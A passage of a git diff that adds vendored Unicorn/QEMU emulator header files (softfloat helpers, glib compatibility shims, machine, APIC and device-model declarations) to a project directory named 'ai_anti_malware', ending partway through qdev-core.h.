floatx80_chs(floatx80 a) +{ + a.high ^= 0x8000; + return a; +} + +static inline int floatx80_is_infinity(floatx80 a) +{ + return (a.high & 0x7fff) == 0x7fff && a.low == 0x8000000000000000LL; +} + +static inline int floatx80_is_neg(floatx80 a) +{ + return a.high >> 15; +} + +static inline int floatx80_is_zero(floatx80 a) +{ + return (a.high & 0x7fff) == 0 && a.low == 0; +} + +static inline int floatx80_is_zero_or_denormal(floatx80 a) +{ + return (a.high & 0x7fff) == 0; +} + +static inline int floatx80_is_any_nan(floatx80 a) +{ + return ((a.high & 0x7fff) == 0x7fff) && (a.low<<1); +} + +/*---------------------------------------------------------------------------- +| Return whether the given value is an invalid floatx80 encoding. +| Invalid floatx80 encodings arise when the integer bit is not set, but +| the exponent is not zero. The only times the integer bit is permitted to +| be zero is in subnormal numbers and the value zero. +| This includes what the Intel software developer's manual calls pseudo-NaNs, +| pseudo-infinities and un-normal numbers. It does not include +| pseudo-denormals, which must still be correctly handled as inputs even +| if they are never generated as outputs. +*----------------------------------------------------------------------------*/ +static inline bool floatx80_invalid_encoding(floatx80 a) +{ + return (a.low & ((uint64_t)1 << 63)) == 0 && (a.high & 0x7FFF) != 0; +} + +#define floatx80_zero make_floatx80(0x0000, 0x0000000000000000LL) +#define floatx80_one make_floatx80(0x3fff, 0x8000000000000000LL) +#define floatx80_ln2 make_floatx80(0x3ffe, 0xb17217f7d1cf79acLL) +#define floatx80_pi make_floatx80(0x4000, 0xc90fdaa22168c235LL) +#define floatx80_half make_floatx80(0x3ffe, 0x8000000000000000LL) +#define floatx80_infinity make_floatx80(0x7fff, 0x8000000000000000LL) + +/*---------------------------------------------------------------------------- +| The pattern for a default generated extended double-precision NaN. 
+*----------------------------------------------------------------------------*/ +extern const floatx80 floatx80_default_nan; + +/*---------------------------------------------------------------------------- +| Software IEC/IEEE quadruple-precision conversion routines. +*----------------------------------------------------------------------------*/ +int32 float128_to_int32( float128 STATUS_PARAM ); +int32 float128_to_int32_round_to_zero( float128 STATUS_PARAM ); +int64 float128_to_int64( float128 STATUS_PARAM ); +int64 float128_to_int64_round_to_zero( float128 STATUS_PARAM ); +float32 float128_to_float32( float128 STATUS_PARAM ); +float64 float128_to_float64( float128 STATUS_PARAM ); +floatx80 float128_to_floatx80( float128 STATUS_PARAM ); + +/*---------------------------------------------------------------------------- +| Software IEC/IEEE quadruple-precision operations. +*----------------------------------------------------------------------------*/ +float128 float128_round_to_int( float128 STATUS_PARAM ); +float128 float128_add( float128, float128 STATUS_PARAM ); +float128 float128_sub( float128, float128 STATUS_PARAM ); +float128 float128_mul( float128, float128 STATUS_PARAM ); +float128 float128_div( float128, float128 STATUS_PARAM ); +float128 float128_rem( float128, float128 STATUS_PARAM ); +float128 float128_sqrt( float128 STATUS_PARAM ); +int float128_eq( float128, float128 STATUS_PARAM ); +int float128_le( float128, float128 STATUS_PARAM ); +int float128_lt( float128, float128 STATUS_PARAM ); +int float128_unordered( float128, float128 STATUS_PARAM ); +int float128_eq_quiet( float128, float128 STATUS_PARAM ); +int float128_le_quiet( float128, float128 STATUS_PARAM ); +int float128_lt_quiet( float128, float128 STATUS_PARAM ); +int float128_unordered_quiet( float128, float128 STATUS_PARAM ); +int float128_compare( float128, float128 STATUS_PARAM ); +int float128_compare_quiet( float128, float128 STATUS_PARAM ); +int float128_is_quiet_nan( float128 ); +int 
float128_is_signaling_nan( float128 ); +float128 float128_maybe_silence_nan( float128 ); +float128 float128_scalbn( float128, int STATUS_PARAM ); + +static inline float128 float128_abs(float128 a) +{ + a.high &= 0x7fffffffffffffffLL; + return a; +} + +static inline float128 float128_chs(float128 a) +{ + a.high ^= 0x8000000000000000LL; + return a; +} + +static inline int float128_is_infinity(float128 a) +{ + return (a.high & 0x7fffffffffffffffLL) == 0x7fff000000000000LL && a.low == 0; +} + +static inline int float128_is_neg(float128 a) +{ + return a.high >> 63; +} + +static inline int float128_is_zero(float128 a) +{ + return (a.high & 0x7fffffffffffffffLL) == 0 && a.low == 0; +} + +static inline int float128_is_zero_or_denormal(float128 a) +{ + return (a.high & 0x7fff000000000000LL) == 0; +} + +static inline int float128_is_any_nan(float128 a) +{ + return ((a.high >> 48) & 0x7fff) == 0x7fff && + ((a.low != 0) || ((a.high & 0xffffffffffffLL) != 0)); +} + +#define float128_zero make_float128(0, 0) + +/*---------------------------------------------------------------------------- +| The pattern for a default generated quadruple-precision NaN. +*----------------------------------------------------------------------------*/ +extern const float128 float128_default_nan; + +#endif /* !SOFTFLOAT_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/glib_compat.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/glib_compat.h new file mode 100644 index 0000000..2d627ed --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/glib_compat.h @@ -0,0 +1,136 @@ +/* +glib_compat.h replacement functionality for glib code used in qemu +Copyright (C) 2016 Chris Eagle cseagle at gmail dot com + +This program is free software; you can redistribute it and/or +modify it under the terms of the GNU General Public License +as published by the Free Software Foundation; either version 2 +of the License, or (at your option) any later version. 
+ +This program is distributed in the hope that it will be useful, +but WITHOUT ANY WARRANTY; without even the implied warranty of +MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +GNU General Public License for more details. + +You should have received a copy of the GNU General Public License +along with this program; if not, write to the Free Software +Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. +*/ + +#ifndef __GLIB_COMPAT_H +#define __GLIB_COMPAT_H + +#include "unicorn/platform.h" +#include <stdarg.h> +#include <stdlib.h> +#include <assert.h> + +#ifndef TRUE +#define TRUE 1 +#endif + +#ifndef FALSE +#define FALSE 0 +#endif + +#define g_assert(expr) assert(expr) +#define g_assert_not_reached() assert(0) + +/* typedefs for glib related types that may still be referenced */ +typedef void* gpointer; +typedef const void *gconstpointer; +typedef int gint; +typedef uint32_t guint32; +typedef uint64_t guint64; +typedef unsigned int guint; +typedef char gchar; +typedef int gboolean; +typedef unsigned long gulong; +typedef unsigned long gsize; + +typedef gint (*GCompareDataFunc)(gconstpointer a, + gconstpointer b, + gpointer user_data); +typedef void (*GFunc)(gpointer data, gpointer user_data); +typedef gint (*GCompareFunc)(gconstpointer v1, gconstpointer v2); +typedef void (*GDestroyNotify)(gpointer data); + +guint g_str_hash(gconstpointer v); +gboolean g_str_equal(gconstpointer v1, gconstpointer v2); +guint g_int_hash(gconstpointer v); + +gboolean g_int_equal(gconstpointer v1, gconstpointer v2); + +typedef struct _GList { + gpointer data; + struct _GList *next; + struct _GList *prev; +} GList; + +GList *g_list_first(GList *list); +void g_list_foreach(GList *list, GFunc func, gpointer user_data); +void g_list_free(GList *list); +GList *g_list_insert_sorted(GList *list, gpointer data, GCompareFunc compare); +#define g_list_next(list) (list->next) +GList *g_list_prepend(GList *list, gpointer data); +GList 
*g_list_remove_link(GList *list, GList *llink); +GList *g_list_sort(GList *list, GCompareFunc compare); + +typedef struct _GSList { + gpointer data; + struct _GSList *next; +} GSList; + +GSList *g_slist_append(GSList *list, gpointer data); +void g_slist_foreach(GSList *list, GFunc func, gpointer user_data); +void g_slist_free(GSList *list); +GSList *g_slist_prepend(GSList *list, gpointer data); +GSList *g_slist_sort(GSList *list, GCompareFunc compare); + +typedef guint (*GHashFunc)(gconstpointer key); +typedef gboolean (*GEqualFunc)(gconstpointer a, gconstpointer b); +typedef void (*GHFunc)(gpointer key, gpointer value, gpointer user_data); +typedef gboolean (*GHRFunc)(gpointer key, gpointer value, gpointer user_data); + +typedef struct _GHashTable GHashTable; + +void g_hash_table_destroy(GHashTable *hash_table); +gpointer g_hash_table_find(GHashTable *hash_table, GHRFunc predicate, gpointer user_data); +void g_hash_table_foreach(GHashTable *hash_table, GHFunc func, gpointer user_data); +void g_hash_table_insert(GHashTable *hash_table, gpointer key, gpointer value); +gpointer g_hash_table_lookup(GHashTable *hash_table, gconstpointer key); +GHashTable *g_hash_table_new(GHashFunc hash_func, GEqualFunc key_equal_func); +GHashTable *g_hash_table_new_full(GHashFunc hash_func, GEqualFunc key_equal_func, + GDestroyNotify key_destroy_func, GDestroyNotify value_destroy_func); +void g_hash_table_remove_all(GHashTable *hash_table); +gboolean g_hash_table_remove(GHashTable *hash_table, gconstpointer key); +void g_hash_table_unref(GHashTable *hash_table); +GHashTable *g_hash_table_ref(GHashTable *hash_table); +guint g_hash_table_size(GHashTable *hash_table); + +/* replacement for g_malloc dependency */ +void g_free(gpointer ptr); +gpointer g_malloc(size_t size); +gpointer g_malloc0(size_t size); +gpointer g_try_malloc0(size_t size); +gpointer g_realloc(gpointer ptr, size_t size); +char *g_strdup(const char *str); +char *g_strdup_printf(const char *format, ...); +char 
*g_strdup_vprintf(const char *format, va_list ap); +char *g_strndup(const char *str, size_t n); +void g_strfreev(char **v); +gpointer g_memdup(gconstpointer mem, size_t byte_size); +gpointer g_new_(size_t sz, size_t n_structs); +gpointer g_new0_(size_t sz, size_t n_structs); +gpointer g_renew_(size_t sz, gpointer mem, size_t n_structs); +gchar* g_strconcat (const gchar *string1, ...); +gchar** g_strsplit (const gchar *string, + const gchar *delimiter, + gint max_tokens); + + +#define g_new(struct_type, n_structs) ((struct_type*)g_new_(sizeof(struct_type), n_structs)) +#define g_new0(struct_type, n_structs) ((struct_type*)g_new0_(sizeof(struct_type), n_structs)) +#define g_renew(struct_type, mem, n_structs) ((struct_type*)g_renew_(sizeof(struct_type), mem, n_structs)) + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/boards.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/boards.h new file mode 100644 index 0000000..e0afde0 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/boards.h @@ -0,0 +1,82 @@ +/* Declarations for use by board files for creating devices. 
*/ + +#ifndef HW_BOARDS_H +#define HW_BOARDS_H + +#include "qemu/typedefs.h" +#include "sysemu/accel.h" +#include "hw/qdev.h" +#include "qom/object.h" +#include "uc_priv.h" + +typedef int QEMUMachineInitFunc(struct uc_struct *uc, MachineState *ms); + +typedef void QEMUMachineResetFunc(void); + +struct QEMUMachine { + const char *family; /* NULL iff @name identifies a standalone machtype */ + const char *name; + QEMUMachineInitFunc *init; + QEMUMachineResetFunc *reset; + int max_cpus; + int is_default; + int arch; +}; + +void memory_region_allocate_system_memory(MemoryRegion *mr, Object *owner, + const char *name, + uint64_t ram_size); + +void qemu_register_machine(struct uc_struct *uc, QEMUMachine *m, const char *type_machine, + void (*init)(struct uc_struct *uc, ObjectClass *oc, void *data)); + +#define TYPE_MACHINE_SUFFIX "-machine" +#define TYPE_MACHINE "machine" +#undef MACHINE /* BSD defines it and QEMU does not use it */ +#define MACHINE(uc, obj) \ + OBJECT_CHECK(uc, MachineState, (obj), TYPE_MACHINE) +#define MACHINE_GET_CLASS(uc, obj) \ + OBJECT_GET_CLASS(uc, MachineClass, (obj), TYPE_MACHINE) +#define MACHINE_CLASS(uc, klass) \ + OBJECT_CLASS_CHECK(uc, MachineClass, (klass), TYPE_MACHINE) + +MachineClass *find_default_machine(struct uc_struct *uc, int arch); + +/** + * MachineClass: + * @qemu_machine: #QEMUMachine + */ +struct MachineClass { + /*< private >*/ + ObjectClass parent_class; + /*< public >*/ + + const char *family; /* NULL iff @name identifies a standalone machtype */ + const char *name; + + int (*init)(struct uc_struct *uc, MachineState *state); + void (*reset)(void); + + int max_cpus; + int is_default; + int arch; +}; + +/** + * MachineState: + */ +struct MachineState { + /*< private >*/ + Object parent_obj; + + /*< public >*/ + ram_addr_t ram_size; + ram_addr_t maxram_size; + const char *cpu_model; + struct uc_struct *uc; + AccelState *accelerator; +}; + +void machine_register_types(struct uc_struct *uc); + +#endif diff --git 
a/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/cpu/icc_bus.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/cpu/icc_bus.h new file mode 100644 index 0000000..cbb9c01 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/cpu/icc_bus.h @@ -0,0 +1,79 @@ +/* icc_bus.h + * emulate x86 ICC (Interrupt Controller Communications) bus + * + * Copyright (c) 2013 Red Hat, Inc + * + * Authors: + * Igor Mammedov <imammedo@redhat.com> + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see <http://www.gnu.org/licenses/> + */ +#ifndef ICC_BUS_H +#define ICC_BUS_H + +#include "exec/memory.h" +#include "hw/qdev-core.h" + +#define TYPE_ICC_BUS "icc-bus" + +#ifndef CONFIG_USER_ONLY + +/** + * ICCBus: + * + * ICC bus + */ +typedef struct ICCBus { + /*< private >*/ + BusState parent_obj; + /*< public >*/ + + MemoryRegion *apic_address_space; +} ICCBus; + +#define ICC_BUS(uc, obj) OBJECT_CHECK(uc, ICCBus, (obj), TYPE_ICC_BUS) + +/** + * ICCDevice: + * + * ICC device + */ +typedef struct ICCDevice { + /*< private >*/ + DeviceState qdev; + /*< public >*/ +} ICCDevice; + +/** + * ICCDeviceClass: + * @init: Initialization callback for derived classes. 
+ * + * ICC device class + */ +typedef struct ICCDeviceClass { + /*< private >*/ + DeviceClass parent_class; + /*< public >*/ + + DeviceRealize realize; +} ICCDeviceClass; + +#define TYPE_ICC_DEVICE "icc-device" +#define ICC_DEVICE_CLASS(uc, klass) \ + OBJECT_CLASS_CHECK(uc, ICCDeviceClass, (klass), TYPE_ICC_DEVICE) + +void icc_bus_register_types(struct uc_struct *uc); + +#endif /* CONFIG_USER_ONLY */ +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/hw.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/hw.h new file mode 100644 index 0000000..54b25b6 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/hw.h @@ -0,0 +1,41 @@ +/* Declarations for use by hardware emulation. */ +#ifndef QEMU_HW_H +#define QEMU_HW_H + +#include "qemu-common.h" + +#if !defined(CONFIG_USER_ONLY) && !defined(NEED_CPU_H) +#include "exec/cpu-common.h" +#endif + +#include "exec/ioport.h" +#include "qemu/log.h" + +#ifdef NEED_CPU_H +#if TARGET_LONG_BITS == 64 +#define qemu_put_betl qemu_put_be64 +#define qemu_get_betl qemu_get_be64 +#define qemu_put_betls qemu_put_be64s +#define qemu_get_betls qemu_get_be64s +#define qemu_put_sbetl qemu_put_sbe64 +#define qemu_get_sbetl qemu_get_sbe64 +#define qemu_put_sbetls qemu_put_sbe64s +#define qemu_get_sbetls qemu_get_sbe64s +#else +#define qemu_put_betl qemu_put_be32 +#define qemu_get_betl qemu_get_be32 +#define qemu_put_betls qemu_put_be32s +#define qemu_get_betls qemu_get_be32s +#define qemu_put_sbetl qemu_put_sbe32 +#define qemu_get_sbetl qemu_get_sbe32 +#define qemu_put_sbetls qemu_put_sbe32s +#define qemu_get_sbetls qemu_get_sbe32s +#endif +#endif + +typedef void QEMUResetHandler(void *opaque); + +void qemu_register_reset(QEMUResetHandler *func, void *opaque); +void qemu_unregister_reset(QEMUResetHandler *func, void *opaque); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/i386/apic.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/i386/apic.h new file 
mode 100644 index 0000000..42b90b9 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/i386/apic.h @@ -0,0 +1,29 @@ +#ifndef APIC_H +#define APIC_H + +#include "qemu-common.h" + +/* apic.c */ +int apic_accept_pic_intr(DeviceState *s); +int apic_get_interrupt(DeviceState *s); +void cpu_set_apic_base(struct uc_struct *uc, DeviceState *s, uint64_t val); +uint64_t cpu_get_apic_base(struct uc_struct *uc, DeviceState *s); +void cpu_set_apic_tpr(struct uc_struct *uc, DeviceState *s, uint8_t val); +uint8_t cpu_get_apic_tpr(struct uc_struct *uc, DeviceState *s); +void apic_init_reset(struct uc_struct *uc, DeviceState *s); +void apic_sipi(DeviceState *s); +void apic_handle_tpr_access_report(DeviceState *d, target_ulong ip, + TPRAccess access); +void apic_poll_irq(DeviceState *d); +void apic_designate_bsp(struct uc_struct *uc, DeviceState *d); + +/* pc.c */ +DeviceState *cpu_get_current_apic(struct uc_struct *uc); + +/* cpu.c */ +bool cpu_is_bsp(X86CPU *cpu); + +void apic_register_types(struct uc_struct *uc); +void apic_common_register_types(struct uc_struct *uc); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/i386/apic_internal.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/i386/apic_internal.h new file mode 100644 index 0000000..b833d14 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/i386/apic_internal.h @@ -0,0 +1,147 @@ +/* + * APIC support - internal interfaces + * + * Copyright (c) 2004-2005 Fabrice Bellard + * Copyright (c) 2011 Jan Kiszka, Siemens AG + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. 
+ * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see <http://www.gnu.org/licenses/> + */ +#ifndef QEMU_APIC_INTERNAL_H +#define QEMU_APIC_INTERNAL_H + +#include "exec/memory.h" +#include "hw/cpu/icc_bus.h" +#include "qemu/timer.h" + +/* APIC Local Vector Table */ +#define APIC_LVT_TIMER 0 +#define APIC_LVT_THERMAL 1 +#define APIC_LVT_PERFORM 2 +#define APIC_LVT_LINT0 3 +#define APIC_LVT_LINT1 4 +#define APIC_LVT_ERROR 5 +#define APIC_LVT_NB 6 + +/* APIC delivery modes */ +#define APIC_DM_FIXED 0 +#define APIC_DM_LOWPRI 1 +#define APIC_DM_SMI 2 +#define APIC_DM_NMI 4 +#define APIC_DM_INIT 5 +#define APIC_DM_SIPI 6 +#define APIC_DM_EXTINT 7 + +/* APIC destination mode */ +#define APIC_DESTMODE_FLAT 0xf +#define APIC_DESTMODE_CLUSTER 1 + +#define APIC_TRIGGER_EDGE 0 +#define APIC_TRIGGER_LEVEL 1 + +#define APIC_LVT_TIMER_PERIODIC (1<<17) +#define APIC_LVT_MASKED (1<<16) +#define APIC_LVT_LEVEL_TRIGGER (1<<15) +#define APIC_LVT_REMOTE_IRR (1<<14) +#define APIC_INPUT_POLARITY (1<<13) +#define APIC_SEND_PENDING (1<<12) + +#define ESR_ILLEGAL_ADDRESS (1 << 7) + +#define APIC_SV_DIRECTED_IO (1<<12) +#define APIC_SV_ENABLE (1<<8) + +#define VAPIC_ENABLE_BIT 0 +#define VAPIC_ENABLE_MASK (1 << VAPIC_ENABLE_BIT) + +#define MAX_APICS 255 + +typedef struct APICCommonState APICCommonState; + +#define TYPE_APIC_COMMON "apic-common" +#define APIC_COMMON(uc, obj) \ + OBJECT_CHECK(uc, APICCommonState, (obj), TYPE_APIC_COMMON) +#define APIC_COMMON_CLASS(uc, klass) \ + OBJECT_CLASS_CHECK(uc, APICCommonClass, (klass), TYPE_APIC_COMMON) +#define APIC_COMMON_GET_CLASS(uc, obj) \ + OBJECT_GET_CLASS(uc, APICCommonClass, (obj), TYPE_APIC_COMMON) + +typedef struct 
APICCommonClass +{ + ICCDeviceClass parent_class; + + DeviceRealize realize; + void (*set_base)(APICCommonState *s, uint64_t val); + void (*set_tpr)(APICCommonState *s, uint8_t val); + uint8_t (*get_tpr)(APICCommonState *s); + void (*enable_tpr_reporting)(APICCommonState *s, bool enable); + void (*vapic_base_update)(APICCommonState *s); + void (*external_nmi)(APICCommonState *s); + void (*pre_save)(APICCommonState *s); + void (*post_load)(APICCommonState *s); + void (*reset)(APICCommonState *s); +} APICCommonClass; + +struct APICCommonState { + ICCDevice busdev; + + MemoryRegion io_memory; + X86CPU *cpu; + uint32_t apicbase; + uint8_t id; + uint8_t version; + uint8_t arb_id; + uint8_t tpr; + uint32_t spurious_vec; + uint8_t log_dest; + uint8_t dest_mode; + uint32_t isr[8]; /* in service register */ + uint32_t tmr[8]; /* trigger mode register */ + uint32_t irr[8]; /* interrupt request register */ + uint32_t lvt[APIC_LVT_NB]; + uint32_t esr; /* error register */ + uint32_t icr[2]; + + uint32_t divide_conf; + int count_shift; + uint32_t initial_count; + int64_t initial_count_load_time; + int64_t next_time; + int idx; + QEMUTimer *timer; + int64_t timer_expiry; + int sipi_vector; + int wait_for_sipi; + + uint32_t vapic_control; + DeviceState *vapic; + hwaddr vapic_paddr; /* note: persistence via kvmvapic */ +}; + +QEMU_PACK( typedef struct VAPICState { + uint8_t tpr; + uint8_t isr; + uint8_t zero; + uint8_t irr; + uint8_t enabled; +}) VAPICState; + +extern bool apic_report_tpr_access; + +bool apic_next_timer(APICCommonState *s, int64_t current_time); +void apic_enable_vapic(struct uc_struct *uc, DeviceState *d, hwaddr paddr); + +void vapic_report_tpr_access(DeviceState *dev, CPUState *cpu, target_ulong ip, + TPRAccess access); + +#endif /* !QEMU_APIC_INTERNAL_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/i386/pc.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/i386/pc.h new file mode 100644 index 0000000..c149ed7 --- /dev/null +++ 
b/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/i386/pc.h @@ -0,0 +1,52 @@ +#ifndef HW_PC_H +#define HW_PC_H + +#include "hw/boards.h" + +/** + * PCMachineState: + */ +struct PCMachineState { + /*< private >*/ + MachineState parent_obj; + + uint64_t max_ram_below_4g; +}; + +#define PC_MACHINE_MAX_RAM_BELOW_4G "max-ram-below-4g" + +/** + * PCMachineClass: + */ +struct PCMachineClass { + /*< private >*/ + MachineClass parent_class; +}; + +typedef struct PCMachineState PCMachineState; +typedef struct PCMachineClass PCMachineClass; + +#define TYPE_PC_MACHINE "generic-pc-machine" +#define PC_MACHINE(uc, obj) \ + OBJECT_CHECK(uc, PCMachineState, (obj), TYPE_PC_MACHINE) +#define PC_MACHINE_GET_CLASS(obj) \ + OBJECT_GET_CLASS(PCMachineClass, (obj), TYPE_PC_MACHINE) +#define PC_MACHINE_CLASS(klass) \ + OBJECT_CLASS_CHECK(PCMachineClass, (klass), TYPE_PC_MACHINE) + +int pc_cpus_init(struct uc_struct *uc, const char *cpu_model); + +FWCfgState *pc_memory_init(MachineState *machine, + MemoryRegion *system_memory, + ram_addr_t begin, + MemoryRegion **ram_memory); +typedef void (*cpu_set_smm_t)(int smm, void *arg); +void cpu_smm_register(cpu_set_smm_t callback, void *arg); + +void pc_machine_register_types(struct uc_struct *uc); +void x86_cpu_register_types(struct uc_struct *uc); + +#define PC_DEFAULT_MACHINE_OPTIONS \ + .max_cpus = 255 + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/m68k/m68k.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/m68k/m68k.h new file mode 100644 index 0000000..893da01 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/m68k/m68k.h @@ -0,0 +1,10 @@ +#ifndef HW_M68K_H +#define HW_M68K_H + +#include "uc_priv.h" + +void dummy_m68k_machine_init(struct uc_struct *uc); + +void m68k_cpu_register_types(void *opaque); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/mips/cpudevs.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/mips/cpudevs.h new file 
mode 100644 index 0000000..ce6b487 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/mips/cpudevs.h @@ -0,0 +1,10 @@ +#ifndef HW_MIPS_CPUDEVS_H +#define HW_MIPS_CPUDEVS_H +/* Definitions for MIPS CPU internal devices. */ + +/* mips_addr.c */ +uint64_t cpu_mips_kseg0_to_phys(void *opaque, uint64_t addr); +uint64_t cpu_mips_phys_to_kseg0(void *opaque, uint64_t addr); +uint64_t cpu_mips_kvm_um_phys_to_kseg0(void *opaque, uint64_t addr); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/mips/mips.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/mips/mips.h new file mode 100644 index 0000000..94a57dd --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/mips/mips.h @@ -0,0 +1,7 @@ +#ifndef HW_MIPS_H +#define HW_MIPS_H + +void mips_machine_init(struct uc_struct *uc); +void mips_cpu_register_types(void *opaque); + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/qdev-core.h b/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/qdev-core.h new file mode 100644 index 0000000..9c9b1e3 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/include/hw/qdev-core.h @@ -0,0 +1,353 @@ +#ifndef QDEV_CORE_H +#define QDEV_CORE_H + +#include "qemu/queue.h" +#include "qemu/typedefs.h" +#include "qemu/bitmap.h" +#include "qom/object.h" +#include "qapi/error.h" + +enum { + DEV_NVECTORS_UNSPECIFIED = -1, +}; + +#define TYPE_DEVICE "device" +#define DEVICE(uc, obj) OBJECT_CHECK(uc, DeviceState, (obj), TYPE_DEVICE) +#define DEVICE_CLASS(uc, klass) OBJECT_CLASS_CHECK(uc, DeviceClass, (klass), TYPE_DEVICE) +#define DEVICE_GET_CLASS(uc, obj) OBJECT_GET_CLASS(uc, DeviceClass, (obj), TYPE_DEVICE) + +typedef enum DeviceCategory { + DEVICE_CATEGORY_BRIDGE, + DEVICE_CATEGORY_USB, + DEVICE_CATEGORY_STORAGE, + DEVICE_CATEGORY_NETWORK, + DEVICE_CATEGORY_INPUT, + DEVICE_CATEGORY_DISPLAY, + DEVICE_CATEGORY_SOUND, + DEVICE_CATEGORY_MISC, + DEVICE_CATEGORY_MAX +} DeviceCategory; + 
+typedef int (*qdev_initfn)(DeviceState *dev); +typedef int (*qdev_event)(DeviceState *dev); +typedef void (*qdev_resetfn)(DeviceState *dev); +typedef int (*DeviceRealize)(struct uc_struct *uc, DeviceState *dev, Error **errp); +typedef void (*DeviceUnrealize)(DeviceState *dev, Error **errp); +typedef void (*BusRealize)(BusState *bus, Error **errp); +typedef void (*BusUnrealize)(BusState *bus, Error **errp); + +struct VMStateDescription; + +/** + * DeviceClass: + * @props: Properties accessing state fields. + * @realize: Callback function invoked when the #DeviceState:realized + * property is changed to %true. The default invokes @init if not %NULL. + * @unrealize: Callback function invoked when the #DeviceState:realized + * property is changed to %false. + * @init: Callback function invoked when the #DeviceState::realized property + * is changed to %true. Deprecated, new types inheriting directly from + * TYPE_DEVICE should use @realize instead, new leaf types should consult + * their respective parent type. + * @hotpluggable: indicates if #DeviceClass is hotpluggable, available + * as readonly "hotpluggable" property of #DeviceState instance + * + * # Realization # + * Devices are constructed in two stages, + * 1) object instantiation via object_initialize() and + * 2) device realization via #DeviceState:realized property. + * The former may not fail (it might assert or exit), the latter may return + * error information to the caller and must be re-entrant. + * Trivial field initializations should go into #TypeInfo.instance_init. + * Operations depending on @props static properties should go into @realize. + * After successful realization, setting static properties will fail. + * + * As an interim step, the #DeviceState:realized property is set by deprecated + * functions qdev_init() and qdev_init_nofail(). + * In the future, devices will propagate this state change to their children + * and along busses they expose. 
+ * The point in time will be deferred to machine creation, so that values + * set in @realize will not be introspectable beforehand. Therefore devices + * must not create children during @realize; they should initialize them via + * object_initialize() in their own #TypeInfo.instance_init and forward the + * realization events appropriately. + * + * The @init callback is considered private to a particular bus implementation + * (immediate abstract child types of TYPE_DEVICE). Derived leaf types set an + * "init" callback on their parent class instead. + * + * Any type may override the @realize and/or @unrealize callbacks but needs + * to call the parent type's implementation if keeping their functionality + * is desired. Refer to QOM documentation for further discussion and examples. + * + * <note> + * <para> + * If a type derived directly from TYPE_DEVICE implements @realize, it does + * not need to implement @init and therefore does not need to store and call + * #DeviceClass' default @realize callback. + * For other types consult the documentation and implementation of the + * respective parent types. + * </para> + * </note> + */ +typedef struct DeviceClass { + /*< private >*/ + ObjectClass parent_class; + /*< public >*/ + + DECLARE_BITMAP(categories, DEVICE_CATEGORY_MAX); + const char *fw_name; + const char *desc; + Property *props; + + /* + * Shall we hide this device model from -device / device_add? + * All devices should support instantiation with device_add, and + * this flag should not exist. But we're not there, yet. Some + * devices fail to instantiate with cryptic error messages. + * Others instantiate, but don't work. Exposing users to such + * behavior would be cruel; this flag serves to protect them. It + * should never be set without a comment explaining why it is set. 
